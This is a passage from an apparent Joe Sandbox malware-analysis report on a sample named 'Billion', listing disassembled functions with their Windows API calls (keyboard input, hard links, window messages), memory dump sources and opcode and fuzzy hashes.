                                                                                                                                                                                                                                                                                                          • Opcode ID: dadcc85492ab069e0bf38bd4140f5300fad89b8b5193b8173417b7f18e0f340f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 312b44556a5dce0681675ece71f8ee6cb924c064ef7f7b2a2750998a106e0234
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dadcc85492ab069e0bf38bd4140f5300fad89b8b5193b8173417b7f18e0f340f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7841F671A04704AFD725AF78CC81BAABBEDEB98710F10853EF115DB291D77199A28780
                                                                                                                                                                                                                                                                                                          Function 001A611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001A61C8
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 001A61EE
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001A6213
                                                                                                                                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001A623F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 69e8883a57abf42b3beece19fbecf2c64d5602902f320db39a2032ee45e86e08
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c9ce0f11bc1ad3dc4f2e46fd68f7343c0fd4dae51affa066b07402d1484f1d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69e8883a57abf42b3beece19fbecf2c64d5602902f320db39a2032ee45e86e08
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA412639600610DFCF11EF65C585A1ABBF2EF99714F198498E84AAB362CB34FD41CB91
                                                                                                                                                                                                                                                                                                          Function 0019B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0019B473
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0019B48F
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0019B4FD
                                                                                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0019B54F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 931e83d1fc6907e13d424eb629f39c9798fbef893289dddc076f0ec4910ec379
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5ddaed4c62ddd79a9c7f7340444c026e5e6079c695f839582c8bbd086630351
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 931e83d1fc6907e13d424eb629f39c9798fbef893289dddc076f0ec4910ec379
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59316870A082186EFF34CB25A989BFE7BB5BF58310F04421AF096971D2C374D98597A1
                                                                                                                                                                                                                                                                                                          Function 0019B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0019B5B8
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0019B5D4
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0019B63B
                                                                                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0019B68D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4321ec55f89f0ab2811f986a8c7f8407b08bb5c0d9755955efe2c18576249049
                                                                                                                                                                                                                                                                                                          • Instruction ID: 18a51c361664a11e69dd94400f32a992d90d13f76d1c07dbb2adf557274965a7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4321ec55f89f0ab2811f986a8c7f8407b08bb5c0d9755955efe2c18576249049
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29316E30948618AEFF348B25E945BFE7BB6EF95310F04422EE081821D1C374EA85CB91
                                                                                                                                                                                                                                                                                                          Function 001C80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 001C80D4
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001C814A
                                                                                                                                                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 001C815A
                                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 001C81C6
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7716219ea44ad7db150c8ae826347e6bbe56003f94473285f98e6cbdf2fcd67a
                                                                                                                                                                                                                                                                                                          • Instruction ID: d14b73b1e84fe6e9f360d1529ea1cb00a753057be4406d39173fa2dac98f0a2b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7716219ea44ad7db150c8ae826347e6bbe56003f94473285f98e6cbdf2fcd67a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8418B30A00259DFCB15CF58D8C8FA9BBF5FB69314F1841ADE9549B261CB30E886CB90
                                                                                                                                                                                                                                                                                                          Function 001C2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001C2187
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001943AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetCurrentThreadId.KERNEL32 ref: 001943B4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00192F00), ref: 001943BB
                                                                                                                                                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 001C219B
                                                                                                                                                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 001C21E8
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001C21EE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d6cc900c3874cbebd2e6dc0f5a8ca164e473b662a57104b7b0a127c52c26ba1a
                                                                                                                                                                                                                                                                                                          • Instruction ID: fadec49eb763d2d6e8df6d507d82699d89b8a89ed4e8eaa2dd1245cd024ee127
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6cc900c3874cbebd2e6dc0f5a8ca164e473b662a57104b7b0a127c52c26ba1a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B3152B5D00209AFDB04EFA5C881DAEBBF8EF58304B54446AE415E7251DB71DE45CBA0
                                                                                                                                                                                                                                                                                                          Function 0019E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E8E2
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E8F9
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E924
                                                                                                                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0019E92F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: dc0d635488dce34831680cf3e20a9e327c78f640b2b29e0cb3da15dc90f2937d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7ce46d638569baaedf01dbe49665afc6ef39563fc00b1dc6123a4a05332ad660
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc0d635488dce34831680cf3e20a9e327c78f640b2b29e0cb3da15dc90f2937d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B21A171900614EFCF11EFA8D982BAEB7F8EF55355F144064E814BF241D770AE418BA1
                                                                                                                                                                                                                                                                                                          Function 001C321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001C32A6
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001C32C0
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001C32CE
                                                                                                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001C32DC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 735851ad2af30ba61ad132ccf8654658d77e41cb76b2644933c09e8e45b413b7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9359de047dd6d073dca6a2c28842e81c2533f199895b33834dfe2cee02bc80c9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735851ad2af30ba61ad132ccf8654658d77e41cb76b2644933c09e8e45b413b7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E21D631204611AFDB149B24D845F6ABB95EFA1318F24C25CF8368B6D2C771ED81CBD0
                                                                                                                                                                                                                                                                                                          Function 0019825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001996E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00198271,?,000000FF,?,001990BB,00000000,?,0000001C,?,?), ref: 001996F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001996E4: lstrcpyW.KERNEL32(00000000,?,?,00198271,?,000000FF,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 00199719
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001996E4: lstrcmpiW.KERNEL32(00000000,?,00198271,?,000000FF,?,001990BB,00000000,?,0000001C,?,?), ref: 0019974A
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 0019828A
                                                                                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 001982B0
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 001982EB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b3b9302554ba7a051f5846fea0a00c26c1e5c0681892ea1fb2b62317ca82e9e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 01ec1d5c800e741ac4a17f391cb547543552bbfb4ddf24fd30112c2e95c2f566
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3b9302554ba7a051f5846fea0a00c26c1e5c0681892ea1fb2b62317ca82e9e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111227A200342ABCF159F78D844E7A77A9FF5A750B10402AFD02CB2A0EF31D912C7A1
                                                                                                                                                                                                                                                                                                          Function 001C60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 001C615A
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C616C
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C6177
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001C62B5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2da8482f63164166308650e94570f6eeb2ad4432f195697845427885800184eb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9d568e5585403aa05751feec35aa970b5c50140310cc448f4de0aaf404b113ea
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2da8482f63164166308650e94570f6eeb2ad4432f195697845427885800184eb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C119075600218AADB24DFA49C84FEF7BBCEB75754B14412EFA15D6082EBB0D984CB60
                                                                                                                                                                                                                                                                                                          Function 00162079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: b18789fc4a0ef4e9dc48b5284aef3a508d67b06f568e830200e5ea92c9b52fea
                                                                                                                                                                                                                                                                                                          • Instruction ID: 10797fcfe4abdfbb1376f85e9ad739f73bdda1f729a65cb5e9e592cd851a95d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18789fc4a0ef4e9dc48b5284aef3a508d67b06f568e830200e5ea92c9b52fea
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC01D1B2609A167FFA2126BCBCC1F676B4DDF527B8B350325F521A11D1DF708CA09160
                                                                                                                                                                                                                                                                                                          Function 00192374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00192394
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001923A6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001923BC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001923D7
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 411f02106f4262a589c82be1a6476deb1e7018c4a4ea6ff5708606c9e5bd16d5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 30f3c6247016a34d316bc5604c887763117b2baf59c3a218b313260d6fe48e43
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 411f02106f4262a589c82be1a6476deb1e7018c4a4ea6ff5708606c9e5bd16d5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6511E53A901218BFEF119BA58D85F9DBB78FB08750F200091EA01B7290D771AE50DB94
                                                                                                                                                                                                                                                                                                          Function 0019EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
